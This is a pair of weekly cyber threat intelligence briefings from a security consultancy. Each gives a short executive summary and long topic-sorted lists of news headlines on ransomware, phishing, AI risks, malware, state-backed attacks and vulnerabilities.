-Netflix, Apple, BofA Websites Hijacked with Fake Help-Desk Numbers

-Police Alerts About New SMS “Blaster” Scams Used for Smishing

-Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security

-Businesses Urged to Strengthen Cyber Defences amid Increase in Iran-Adjacent Attacks

-National Security Strategy 2025: Security for the British People in a Dangerous World

-How Geopolitical Tensions Are Shaping Cyber Warfare

Executive Summary

This week, our review of cyber security intelligence in the specialist and general media includes the latest ransomware report by Sophos, which shows that nearly half of organisations paid the ransom and over 40% of victims cited unrecognised security gaps as entry points for attackers. We discuss that popular entry points include employees, with phishing being particularly successful against newly hired employees and smaller organisations not training their staff. We also discuss the pressures of cyber security on key roles in the organisation: for CISOs, more than half are under pressure to keep breaches secret and many want a pause on AI deployment in their organisation; for CFOs, the challenge is to quantify and manage the financial risk of a breach.

Other articles describe how attackers are moving into the insurance, aviation and transportation sectors, while other attackers are using tactics including hijacking search results for major brands, or sending malicious text messages to phones that have been lured onto fake networks. Businesses are urged to address their supply chain risks and their wider security in the light of geopolitical risks from the Middle East, Russia, China and North Korea.

The recurring theme is the need for organisations to understand and proactively manage their risks through proportionate controls, and to establish and rehearse how to respond to an incident in order to remain resilient in the face of escalating threats.

Governance, Risk and Compliance

BT warns UK SMEs are primary targets for hackers as only three in five have had cyber security training

Comms Business - Almost 40 per cent of SMEs have no cyber security training, BT survey finds

BT says nearly half small businesses have suffered a cyber attack in the last year

Cyber security neglect issue for UK businesses? - The Recycler

Insurance industry in the cyber crosshairs: Firms urged to reinforce defences | Insurance Business America

More than half of cyber security professionals told to conceal breaches, survey claims

SecurityScorecard Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security

Cyber security Governance: A Guide for Businesses to Follow | TechTarget

Is Your CISO Ready to Flee? - Security Boulevard

After a hack many firms still say nothing, and that’s a problem - Help Net Security

Cyber attacks on insurers put CFOs on high alert | Fortune

How CISOs can justify security investments in financial terms - Help Net Security

Global Cyber Security Professionals Cite Top Threats, Concerns, And Challenges In New Bitdefender Report | Scoop News

How Executives Could Respond When Faced With Multiple Crisis Situations

How Customer Trust Can Shield Your Business In A Crisis

What is Risk Avoidance? | Definition from TechTarget

How to Keep Up with Overlapping Cyber Security Regulations in Finance - Infosecurity Magazine

Threats

Ransomware, Extortion and Destructive Attacks

Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds

UK ransomware costs significantly outpace other countries | Computer Weekly

Four REvil ransomware crooks walk free after admitting guilt • The Register

Ransomware threat actors today and how to thwart them | TechTarget

Cyber criminals cash in on stolen cookies and credentials | Insurance Business America

Qilin Ransomware Adds "Call Lawyer" Feature to Pressure Victims for Larger Ransoms

Bring Your Own Installer EDR Bypass Observed in Ransomware Operation | MSSP Alert

Dire Wolf Ransomware Comes Out Snarling, Bites Verticals

Ransomware in Cars: Why Automotive Cyber Attacks Are Spiking in 2025 | Raleigh News & Observer

Ransomware Victims

Major insurer hit by giant cyber attack | Insurance Business America

M&S and Co-op Hacks Classified as Single Cyber Event - Infosecurity Magazine

Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to $592M in Damages

M&S cyber-attack boosted sales at Next, Zara and H&M

Patient death at London hospital linked to cyber attack on NHS – DataBreaches.Net

M&S cyber attack deepens as tech partner TCS denies blame - Retail Gazette

3 key takeaways from the Scattered Spider attacks on insurance firms

Whole Foods supplier UNFI restores core systems after cyber attack

Services disrupted as cyber attack hits Glasgow Council - UKTN

Phishing & Email Based Attacks

Report on New Hires and Phishing Susceptibility

Microsoft 365 'Direct Send' abused to send phishing as internal users

Employers: A cautionary tale about new cyber threats involving employee handbooks | Clark Hill PLC - JDSupra

Other Social Engineering

Employers: A cautionary tale about new cyber threats involving employee handbooks | Clark Hill PLC - JDSupra

Police warn of SMS scams as ‘blaster’ is used to send thousands of texts | Scams | The Guardian

How Foreign Scammers Use US Banks to Fleece Americans — ProPublica

ClickFix attacks skyrocketing more than 500% - Help Net Security

New FileFix Method Emerges as a Threat Following 517% Rise in ClickFix Attacks

New wave of ‘fake interviews’ use 35 npm packages to spread malware

Fraud, Scams and Financial Crime

Netflix, Apple, BofA sites hijacked with fake help numbers • The Register

Is crime turning digital? Almost all Brits believe cyber crime is more of a risk - here's how to stay safe | TechRadar

Police warn of SMS scams as ‘blaster’ is used to send thousands of texts | Scams | The Guardian

How Foreign Scammers Use U.S. Banks to Fleece Americans — ProPublica

Reported Impersonation Scams Surge 148% as AI Takes Hold - Infosecurity Magazine

Malware Campaign Uses Rogue WordPress Plugin to Skim Credit Cards - Infosecurity Magazine

Half of Customer Signups Are Now Fraudulent - Infosecurity Magazine

UK cyber attacks set to continue amid ‘fraud pandemic’, security experts warn | The Independent

Amazon Prime Day Is Coming — How To Protect Yourself From Scammers

Artificial Intelligence

New AI Jailbreak Bypasses Guardrails With Ease - SecurityWeek

Most AI and SaaS apps are outside IT's control - Help Net Security

Reported Impersonation Scams Surge 148% as AI Takes Hold - Infosecurity Magazine

AI Is Behind 50% Of Spam — And Now It’s Hacking Your Accounts

Researchers say cyber criminals are using jailbroken AI tools from Mistral and xAI | The Record from Recorded Future News

AI Agents Are Getting Better at Writing Code—and Hacking It as Well | WIRED

Navigating Generative AI's Expanding Capabilities and Evolving Risks

Half of Security Pros Want GenAI Deployment Pause - Infosecurity Magazine

Vulnerability in Public Repository Could Enable Hijacked LLM Responses | Security Magazine

And Now Malware That Tells AI to Ignore It?

Hundreds of MCP Servers at Risk of RCE and Data Leaks - Infosecurity Magazine

We know GenAI is risky, so why aren't we fixing its flaws? - Help Net Security

Trump’s plan to ban US states from AI regulation will ‘hold us back’, says Microsoft science chief | Artificial intelligence (AI) | The Guardian

US Army Blocks Air Force's AI Program Over Data Security Concerns | Air & Space Forces Magazine

Malware

Researchers discover first malware to exploit AI prompt injection

And Now Malware That Tells AI to Ignore It?

Malware Campaign Uses Rogue WordPress Plugin to Skim Credit Cards - Infosecurity Magazine

20,000 Malicious IPs And Domains Taken Down In INTERPOL Infostealer Crackdown – Eurasia Review

Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security

Threat Actor Trojanizes Copy of SonicWall NetExtender App

Attackers Wield Signed ConnectWise Installers as Malware

New wave of ‘fake interviews’ use 35 npm packages to spread malware

Threat Actor Allegedly Selling FortiGate API Exploit Tool Targeting FortiOS

APT28 hackers use Signal chats to launch new malware attacks on Ukraine

XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks

Cyber attacks on state bodies: a multi-level interaction scheme via Word and Signal revealed | УНН

Prometei botnet activity has surged since March 2025

WinRAR patches bug letting malware launch from extracted archives

Hackers abuse Microsoft ClickOnce and AWS services for stealthy attacks

OneClik Malware Targets Energy Sector Using Microsoft ClickOnce and Golang Backdoors

Bots/Botnets

Prometei botnet activity has surged since March 2025

Half of Customer Signups Are Now Fraudulent - Infosecurity Magazine

Mobile

Godfather Malware Targets 400+ Banking Apps Worldwide

SparkKitty Swipes Pics From iOS, Android Devices

You should probably delete any sensitive screenshots you have in your phone right now. Here's why | ZDNET

What to do if your mobile phone account is hacked or number stolen | Mobile phones | The Guardian

Denial of Service/DoS/DDoS

Cloudflare blocked record-breaking 7.3 Tbps DDoS attack against a hosting provider

Record DDoS pummels site with once-unimaginable 7.3Tbps of junk traffic - Ars Technica

Internet of Things – IoT

Typhoon-like gang slinging TLS certificate 'signed' by LAPD • The Register

A sneaky cyber espionage campaign is exploiting IoT devices and home office routers – here's what you need to know | IT Pro

Chinese APT Hacking Routers to Build Espionage Infrastructure - SecurityWeek

Ransomware in Cars: Why Automotive Cyber Attacks Are Spiking in 2025 | Raleigh News & Observer

DSIT identifies cyber security weaknesses in IoT devices | UKAuthority

Israel urges citizens to turn off home cameras as Iran hacks surveillance systems | TechSpot

Medical device cyber attacks push hospitals into crisis mode - Help Net Security

Data Breaches/Leaks

Supply Chain Attack Hits Swiss Banks | SC Media UK

Heard about the 16 billion passwords leak? Here are the facts and how to protect yourself | ZDNET

Oxford City Council suffers breach exposing two decades of data

Hacker 'IntelBroker' charged in US for global data theft breaches

Minister announces temporary legal aid reforms after cyber-attack on Legal Aid Agency | Electronic Immigration Network

Steel Giant Nucor Confirms Data Stolen in Cyber Attack

Cyber attacks at two Melbourne hospitals expose patient details on dark web

Hawaiian Airlines discloses cyber attack, flights not affected

Former US Army Sergeant admits he sold secrets to China • The Register

Advance Auto Parts data breach class action settlement

Organised Crime & Criminal Actors

Is crime turning digital? Almost all Brits believe cyber crime is more of a risk - here's how to stay safe | TechRadar

Man Who Hacked Organisations to Advertise Security Services Pleads Guilty - SecurityWeek

Man pleads guilty to hacking networks to pitch security services

British Man Suspected of Being the Hacker IntelBroker Arrested, Charged - SecurityWeek

Money mule networks evolve into hierarchical, business-like criminal enterprises - Help Net Security

Africa Sees Surge in Cyber Crime as Law Enforcement Struggles

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

You should probably delete any sensitive screenshots you have in your phone right now. Here's why | ZDNET

Attackers Target Docker APIs in Stealthy Crypto Heist

Bank hacks, internet shutdowns and crypto heists: Here’s how the war between Israel and Iran is playing out in cyberspace - POLITICO

Supply Chain and Third Parties

SecurityScorecard Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security

Supply Chain Attack Hits Swiss Banks | SC Media UK

M&S and Co-op Hacks Classified as Single Cyber Event - Infosecurity Magazine

Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to $592M in Damages

Most organisations are at risk thanks to immature supply chain security | TechRadar

M&S cyber attack deepens as tech partner TCS denies blame - Retail Gazette

MSPs Juggle High Breach Rates and Strong Cyber Confidence | MSSP Alert

Security pro counts the cost of Microsoft dependency • The Register

Critical Open VSX Registry Flaw Exposes Millions of Developers to Supply Chain Attacks

Why Are CISOs Prioritizing Snowflake Security? The Breach Playbook Has Changed. - Security Boulevard

Officials set out cyber security charter for NHS suppliers | UKAuthority

Cloud/SaaS

Most AI and SaaS apps are outside IT's control - Help Net Security

The Hidden Risks of SaaS: Why Built-In Protections Aren't Enough for Modern Data Resilience

Why Are CISOs Prioritizing Snowflake Security? The Breach Playbook Has Changed. - Security Boulevard

Hackers abuse Microsoft ClickOnce and AWS services for stealthy attacks

When the Cloud Goes Down, Will Your Security Go With It? | Symantec Enterprise Blogs

Outages

UK mobile telco Three suffers voice, text outage • The Register

Encryption

China breaks RSA encryption with a quantum computer - Earth.com

Quantum risk is already changing cyber security - Help Net Security

Home Office anti-encryption site pushes payday loan scheme • The Register

Linux and Open Source

Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security

Linux flaws chain allows Root access across major distributions

French city of Lyon ditching Microsoft for FOSS • The Register

Passwords, Credential Stuffing & Brute Force Attacks

Heard about the 16 billion passwords leak? Here are the facts and how to protect yourself | ZDNET

Cyber criminals cash in on stolen cookies and credentials | Insurance Business America

Brother printer bug in 689 models exposes default admin passwords

Social Media

Twitter refuses to explain what it’s doing about hate speech and misinformation, sues New York State for asking • Graham Cluley

Regulations, Fines and Legislation

UK Bill Would Increase Cyber Security Standards for Critical Infrastructure Operators | Skadden, Arps, Slate, Meagher & Flom LLP - JDSupra

Home Office anti-encryption site pushes payday loan scheme • The Register

How to Keep Up with Overlapping Cyber Security Regulations in Finance - Infosecurity Magazine

Top Pentagon spy pick rejected by White House - POLITICO

WhatsApp messaging app banned on all US House of Representatives devices | WhatsApp | The Guardian

CISA Is Shrinking: What Does It Mean for Cyber?

Trump’s plan to ban US states from AI regulation will ‘hold us back’, says Microsoft science chief | Artificial intelligence (AI) | The Guardian

Foreign aircraft, domestic risks | CSO Online

Models, Frameworks and Standards

UK Bill Would Increase Cyber Security Standards for Critical Infrastructure Operators | Skadden, Arps, Slate, Meagher & Flom LLP - JDSupra

New Cyber Blueprint to Scale Up the EU Cyber Security Crisis Management | ENISA

Careers, Working in Cyber and Information Security

Why work-life balance in cyber security must start with executive support - Help Net Security

Getting a career in cyber security isn’t easy, but this can help

UK Gov Cyber Security Jobs Average Salary is Under £45,000, Study Finds - Infosecurity Magazine

Charming Kitten APT Tries Spying on Israeli Cyber Experts

Law Enforcement Action and Take Downs

Man Who Hacked Organisations to Advertise Security Services Pleads Guilty - SecurityWeek

British Man Suspected of Being the Hacker IntelBroker Arrested, Charged - SecurityWeek

20,000 Malicious IPs And Domains Taken Down In INTERPOL Infostealer Crackdown – Eurasia Review

Four REvil ransomware crooks walk free after admitting guilt • The Register

Hacker 'IntelBroker' charged in US for global data theft breaches

Indian police arrest 10 for laundering fraud proceeds for a Chinese gang | Cryptopolitan

Misinformation, Disinformation and Propaganda

Twitter refuses to explain what it’s doing about hate speech and misinformation, sues New York State for asking • Graham Cluley

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

How Cyber Warfare Changes the Face of Geopolitical Conflict

National Security Strategy 2025: Security for the British People in a Dangerous World (HTML) - GOV.UK

How Geopolitical Tensions Are Shaping Cyber Warfare

A militarily degraded Iran may turn to asymmetrical warfare – raising risk of proxy and cyber attacks

Cyber warfare escalates: Israel and Iran's digital conflict

Nation State Actors

How Cyber Warfare Changes the Face of Geopolitical Conflict

Are we making hackers sound too cool? These security experts think so | TechRadar

Decade of risk: signaling security in an era of geopolitical tension - DCD

National Security Strategy 2025: Security for the British People in a Dangerous World (HTML) - GOV.UK

China

Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security

China breaks RSA encryption with a quantum computer - Earth.com

A sneaky cyber espionage campaign is exploiting IoT devices and home office routers – here's what you need to know | IT Pro

Chinese APT Hacking Routers to Build Espionage Infrastructure - SecurityWeek

China-linked APT Salt Typhoon targets Canadian Telecom companies

Indian police arrest 10 for laundering fraud proceeds for a Chinese gang | Cryptopolitan

Former US Army Sergeant admits he sold secrets to China • The Register

China increases cyber attacks on hospitals to ‘humiliate’ Taiwan

Russia

Russia releases REvil members after convictions for payment card fraud | The Record from Recorded Future News

APT28 hackers use Signal chats to launch new malware attacks on Ukraine

XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks

Cyber attacks on state bodies: a multi-level interaction scheme via Word and Signal revealed | УНН

Iran

A militarily degraded Iran may turn to asymmetrical warfare – raising risk of proxy and cyber attacks

Heightened Cyber Threat from Iran Sparks Urgent Calls for Vigilance and Mitigation - Security Boulevard

Businesses urged to strengthen cyber defences amid increase in Iran-adjacent attacks | Politics News | Sky News

Cyber warfare escalates: Israel and Iran's digital conflict

Bank hacks, internet shutdowns and crypto heists: Here’s how the war between Israel and Iran is playing out in cyberspace - POLITICO

Israel urges citizens to turn off home cameras as Iran hacks surveillance systems | TechSpot

The real threat to the UK from Iran - from sleeper cells to cyber attacks

Israel expands cyber powers amid rising threats—via WhatsApp | Ctech

Tools and Controls

Most AI and SaaS apps are outside IT's control - Help Net Security

Are we making hackers sound too cool? These security experts think so | TechRadar

The Hidden Risks of SaaS: Why Built-In Protections Aren't Enough for Modern Data Resilience

When the Cloud Goes Down, Will Your Security Go With It? | Symantec Enterprise Blogs

And Now Malware That Tells AI to Ignore It?

AI Agents Are Getting Better at Writing Code—and Hacking It as Well | WIRED

Half of Security Pros Want GenAI Deployment Pause - Infosecurity Magazine

Microsoft rolls out Windows security changes to prevent another CrowdStrike meltdown | ZDNET

Don’t be distracted by AI – fundamental cyber skills are still key | TechRadar

Bring Your Own Installer EDR Bypass Observed in Ransomware Operation | MSSP Alert

What is Risk Avoidance? | Definition from TechTarget

How CISOs can justify security investments in financial terms - Help Net Security

How Executives Could Respond When Faced With Multiple Crisis Situations

Building cyber resilience in the financial sector

Other News

BT warns UK SMEs are primary targets for hackers as only three in five have had cyber security training

BT says nearly half small businesses have suffered a cyber attack in the last year

Insurance industry in the cyber crosshairs: Firms urged to reinforce defences | Insurance Business America

Microsoft rolls out Windows security changes to prevent another CrowdStrike meltdown | ZDNET

Services disrupted as cyber attack hits Glasgow Council - UKTN

Cyber attacks on insurers put CFOs on high alert | Fortune

EU and Australia commit to Defence Partnership| Cybernews

Thousands of UK government laptops, phones and tablets have been lost or stolen | Cybercrime | The Guardian

Building cyber resilience in the financial sector

Decade of risk: signaling security in an era of geopolitical tension - DCD

Medical device cyber attacks push hospitals into crisis mode - Help Net Security

Cyber Intel Pros and Hobbyists Can Now Report Threats Anonymously - Infosecurity Magazine

French city of Lyon ditching Microsoft for FOSS • The Register

Security pro counts the cost of Microsoft dependency • The Register

Some European Countries Are Ditching Microsoft Software For Good (And Here's Why That Matters)

Denmark is switching to Linux | PC Gamer

Dual-Use Military and Civil Airports Face Cyber Threats

The Security Fallout of Cyber Attacks on Government Agencies - Security Boulevard

Meta boss praises new US army division enlisting tech execs as lieutenant colonels | US military | The Guardian

Cyber Skills Today for Economic Growth Tomorrow

Foreign aircraft, domestic risks | CSO Online

Felicity Oswald, chief operating officer at UK’s NCSC, set to leave cyber agency | The Record from Recorded Future News

Vulnerability Management

Windows updates might finally be getting better — Microsoft to remove legacy drivers from Windows Update to boost security | Tom's Hardware

'7% of organisations tackle vulnerabilities only when necessary' - Data Centre & Network News

CISA Is Shrinking: What Does It Mean for Cyber?

Irish businesses show gaps in cyber security as 6 in 10 overlook regular software updates

Vulnerabilities

Critical Citrix NetScaler bug fixed, upgrade ASAP! (CVE-2025-5777) - Help Net Security

Up next on the KEV? All signs point to 'CitrixBleed 2' • The Register

Critical RCE Flaws in Cisco ISE and ISE-PIC Allow Unauthenticated Attackers to Gain Root Access

Linux flaws chain allows Root access across major distributions

Threat Actor Allegedly Selling FortiGate API Exploit Tool Targeting FortiOS

Hundreds of MCP Servers at Risk of RCE and Data Leaks - Infosecurity Magazine

Asana Fixes Security Flaw in AI Data Integration Tool

Chrome 138, Firefox 140 Patch Multiple Vulnerabilities - SecurityWeek

Millions of Brother Printers Hit by Critical Unpatchable Bug

CISA Adds 3 Flaws to KEV Catalog, Impacting AMI MegaRAC, D-Link, Fortinet

Critical Open VSX Registry Flaw Exposes Millions of Developers to Supply Chain Attacks

WinRAR patches bug letting malware launch from extracted archives

Critical Teleport Vulnerability Let Attackers Remotely Bypass Authentication Controls

Flaw in Notepad++ installer could grant attackers SYSTEM access (CVE-2025-49144) - Help Net Security

Motors Theme Vulnerability Exploited to Hack WordPress Websites - SecurityWeek

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 22/06/2025 Black Arrow Admin 22/06/2025

Black Arrow Cyber Threat Intelligence Briefing 20 June 2025

Black Arrow Cyber Threat Intelligence Briefing 20 June 2025:

-Survey Reveals 98% of CISOs Anticipate Increased Cyber Attacks Within Three Years

-Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals

-IT Helpdesk Scams are Ramping Up – Here’s What Leaders Can Do

-Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk

-Why CISOs Must Align Business Objectives and Cyber Security

-Scattered Spider has Moved from Retail to Financial Services, Insurance Now Targeted

-Ransomware Thrives in Shook-Up Criminal Underworld

-Russian Gang’s Cyber Attack on UK Blood Services ‘Harmed 170 Patients’

-Experts Warn Clicking "Unsubscribe" Could Actually be a Security Risk, Here's Why

-Security Is Only as Strong as the Weakest Third-Party Link

-Employees Are Using AI Where They Know They Shouldn’t

-Threat of Cyber Attacks from Iran Concern Security Experts

Executive Summary

Our review of cyber security in specialist and general media this week features a survey of 300 CISOs where 98% expect increased cyber threats within three years, with growing concern over third-party risks and hybrid outsourcing models. A separate survey revealed that 69% of managed service providers (MSPs) reported multiple cyber breaches in the last 12 months, highlighting supply chain risks to be managed by organisations including the popular attack tactic of IT Helpdesk scams. We also report on the evolution of phishing using agentic-AI and deepfake, and the use of ‘unsubscribe’ buttons on phishing emails to compromise the recipient’s systems.

The structure and tactics of the criminal ecosystem continues to evolve. New attacker groups are emerging as others disappear and existing groups are moving from the retail sector to target financial services, while Iranian cyber attackers are coming to the fore. We also report on the need for CISOs to demonstrate board-level alignment of security and business growth, and the need for stronger governance over the use of AI in organisations.

At Black Arrow Cyber Consulting, we strongly believe these developing risks are best addressed through an organisational-wide approach to security. In line with globally respected frameworks, this starts with governance by a leadership team that has a strong understanding of the fundamentals of cyber security using controls across people, operations and technology to address the evolving risks including social engineering, third party risks, and AI.

Governance, Risk and Compliance

Survey reveals 98% of CISOs anticipate increased cyber attacks within three years – Tech Monitor

Why CISOs Must Align Business Objectives & Cyber Security

Cyber Security Strategy Shifts Amid Global Political Tensions

How to Break the Security Theater Illusion

Bridging the Gap Between CEOs and CISOs for AI Adoption | MSSP Alert

What is a compliance audit? (with an example checklist) | TechTarget

Security Is Only as Strong as the Weakest Third-Party Link

Security Evolution: From Pothole Repair to Road Building

Choosing a Clear Direction in the Face of Growing Cyber Security Demands - SecurityWeek

7 trends shaping digital transformation in 2025 - and AI looms large | ZDNET

How C-suite roles are shaping the future of tech leadership - Help Net Security

15 Emerging Cyber Security Threats and How to Prepare - DevX

Changing nature of cyber threat leads to ‘brittle’ risk landscape - Insurance Post

Threats

Ransomware, Extortion and Destructive Attacks

Scattered Spider Using Aggressive Social Engineering Techniques to Deceive IT Support Teams

IT helpdesk scams are ramping up –here’s what leaders can do | IT Pro

Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion

Lockbit’s hidden reality: Ransomware’s hidden secret: affiliates are incompetent morons that will betray on first chance | Cybernews

Scattered Spider targets insurance firms, Google warns • The Register

Hackers switch to targeting US insurance companies

Ransomware Thrives in Shook-Up Criminal Underworld

Qilin Ransomware Emerges as World's Top Threat, Demands $50 Million Ransom

Fog ransomware attacks use employee monitoring tool to break into business networks | TechRadar

How cyber insurers are adapting to the new ransomware playbook | Insurance Business America

Anubis ransomware adds wiper to destroy files beyond recovery

Ransomware Group Qilin Offers Legal Counsel to Affiliates - Infosecurity Magazine

Ransomware gang busted in Thailand hotel raid

Don’t Get Caught in Scattered Spider’s Web | McCarter & English, LLP - JDSupra

Ransomware 3.0: A Glimpse Into the Post-Trust Ecosystem

Bert Ransomware: What You Need To Know | Fortra

Cyber attack purportedly compromises Scania’s corporate insurance subsidiary | SC Media

Ryuk ransomware’s initial access expert extradited to the US

Ransomware Victims

Russian gang’s cyber attack on blood services ‘harmed 170 patients’ - LBC

Victoria’s Secret restores critical systems after cyber attack

Freedman HealthCare targeted by cyber extortionists • The Register

Cyber attack pushes German napkin company into insolvency – DataBreaches.Net

‘No systems or users were compromised’: TCS clarifies as Marks & Spencer investigates cyber breach | Company Business News

2 Insurers Say Ongoing Outages Are Not Caused by Ransomware

Phishing & Email Based Attacks

Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk

ChainLink Phishing: How Trusted Domains Become Threat Vectors

Why You Should Think Twice Before You Click ‘Unsubscribe’ in an Email - WSJ

Researcher shows how Android notifications can be a phisher's gold mine

Phishing goes prime time: Hackers use trusted sites to hijack search rankings | CSO Online

Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek

Same Sea, New Phish: Russian Government-Linked Social Engineering Targets App-Specific Passwords - The Citizen Lab

MailerLite warns of phishing campaign • Graham Cluley

Microsoft 365 security in the spotlight after Washington Post hack - Neowin

Washington Post email breach under probe | Cybernews

Other Social Engineering

SCATTERED SPIDER Using Aggressive Social Engineering Techniques to Deceive IT Support Teams

IT helpdesk scams are ramping up –here’s what leaders can do | IT Pro

North Korean hackers deepfake execs in Zoom call to spread Mac malware

Researcher shows how Android notifications can be a phisher's gold mine

Virtual kidnapping scams prey on our worst fears - Help Net Security

Why Are Cyber Criminals Targeting Law Firms With Voice Phishing? | Law.com

US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network

New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack - SecurityWeek

Fraud, Scams and Financial Crime

Brits Lose £106m to Romance Fraud in a Year - Infosecurity Magazine

Why You Should Think Twice Before You Click ‘Unsubscribe’ in an Email - WSJ

US recovers $225 million of crypto stolen in investment scams

Scammers hijack real support pages to show fake phone numbers | TechSpot

Paddle settles for $5 million over facilitating tech support scams

Krispy Kreme Data Breach Puts Employees at Risk of Financial Fraud - Infosecurity Magazine

Artificial Intelligence

The Growing Cyber Risks from AI — and How Organisations Can Fight Back | Jackson Lewis P.C. - JDSupra

North Korean hackers deepfake execs in Zoom call to spread Mac malware

Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk

Employees are using AI where they know they shouldn’t - Help Net Security

Bridging the Gap Between CEOs and CISOs for AI Adoption | MSSP Alert

China’s Spy Agencies Are Investing Heavily in AI, Researchers Say - The New York Times

NCSC sounds warning over AI threat to critical national infrastructure | UKAuthority

As Geopolitical Tensions Rise AI Is Amplifying the Threat of Global Cyberwarfare

Who's guarding the AI? Even security teams are bypassing oversight - Help Net Security

M365 Copilot: New Zero-Click AI Flaw Allows Corporate Data Theft - Infosecurity Magazine

Why CISOs need to understand the AI tech stack - Help Net Security

CISOs flag gaps in GenAI strategy, skills, and infrastructure - Help Net Security

7 trends shaping digital transformation in 2025 - and AI looms large | ZDNET

Before scaling GenAI, map your LLM usage and risk zones - Help Net Security

LLM agents flunk CRM and confidentiality tasks • The Register

Stop Anthropomorphizing AI and Secure It Like Software

How CISOs Can Govern AI & Meet Evolving Regulations

Mitigating AI Threats: Bridging the Gap Between AI and Legacy Security - SecurityWeek

Researchers Warn of AI Attacks After PoC Exploits Atlassian's AI Agent - Infosecurity Magazine

Malware attack disguises itself as DeepSeek installer • Graham Cluley

2FA/MFA

Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek

Same Sea, New Phish: Russian Government-Linked Social Engineering Targets App-Specific Passwords - The Citizen Lab

Why SMS two-factor authentication codes aren't safe and what to use instead | ZDNET

Malware

North Korean hackers deepfake execs in Zoom call to spread Mac malware

Malware attack disguises itself as DeepSeek installer • Graham Cluley

New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack - SecurityWeek

This invisible malware hijacks checkout pages using trusted Google URLs, and you’ll never see it coming | TechRadar

Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month

Threat Actors Target Victims with HijackLoader and DeerStealer - Infosecurity Magazine

Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop

Google Chrome Zero-Day CVE-2025-2783 Exploited by TaxOff to Deploy Trinper Backdoor

Threat Actors Attacking Windows System With New Winos 4.0 Malware

Sneaky Serpentine#Cloud slithers through Cloudflare tunnels • The Register

Godfather malware is now hijacking legitimate banking apps — and you won’t see it coming | Tom's Guide

Banana Squad’s Stealthy GitHub Malware Campaign Targets Devs - Infosecurity Magazine

New Campaigns Distribute Malware via Open Source Hacking Tools - SecurityWeek

North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine

Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets

Malicious Chimera Turns Larcenous on Python Index

Security Bite: Infostealer malware spikes 28% among Mac users, says Jamf - 9to5Mac

'Water Curse' Targets Infosec Pros via Poisoned GitHub Repos

Russia detects first SuperCard malware attacks skimming bank data via NFC | The Record from Recorded Future News

Bots/Botnets

Hackers Exploit Langflow Flaw to Unleash Flodrix Botnet

Mobile

Researcher shows how Android notifications can be a phisher's gold mine

Godfather Android malware now uses virtualization to hijack banking apps

New Android Malware Surge Hits Devices via Overlays, Virtualization Fraud and NFC Theft

Denial of Service/DoS/DDoS

Protecting Against Origin Server DDoS Attacks - Security Boulevard

Internet of Things – IoT

Thieves don't need your car keys, just a wireless signal - Help Net Security

Cities of the Future or Hacker’s Paradise? The Cyber Security Risks of Smart Cities - Security Boulevard

SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles - Help Net Security

New study warns of cyber security threats to smart grids from false data injection attacks | Newswise

Data Breaches/Leaks

The 20 biggest data breaches of the 21st century | CSO Online

UBS Employee Data Reportedly Exposed in Third Party Attack - Infosecurity Magazine

GCHQ intern who took secret data home jailed - BBC News

FCA warned four staffers who pocketed regulator data • The Register

UK fines 23andMe for ‘profoundly damaging’ breach exposing genetics data

Cartier Data Breach: Luxury Retailer Warns Customers That Personal Data Was Exposed - SecurityWeek

Telecom giant Viasat breached by China's Salt Typhoon hackers

No, the 16 billion credentials leak is not a new data breach

Hackers Access Legacy Systems in Oxford City Council Cyber Attack - SecurityWeek

Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals - IT Security Guru

MSPs remain confident over security | Microscope

Freedman HealthCare targeted by cyber extortionists • The Register

CCC breach exposes 9M Americans, hackers claim | Cybernews

Worrying attack sees 10,000 records allegedly belonging to VirtualMacOSX leaked - here's what we know | TechRadar

Hackers claim 64 million leaked T-Mobile records, but it denies breach - here's what customers need to know | TechRadar

Krispy Kreme Data Breach Puts Employees at Risk of Financial Fraud - Infosecurity Magazine

Microsoft 365 security in the spotlight after Washington Post hack - Neowin

Paraguay Suffered Data Breach: 7.4 Million Citizen Records Leaked on Dark Web

Zoomcar discloses security breach impacting 8.4 million users

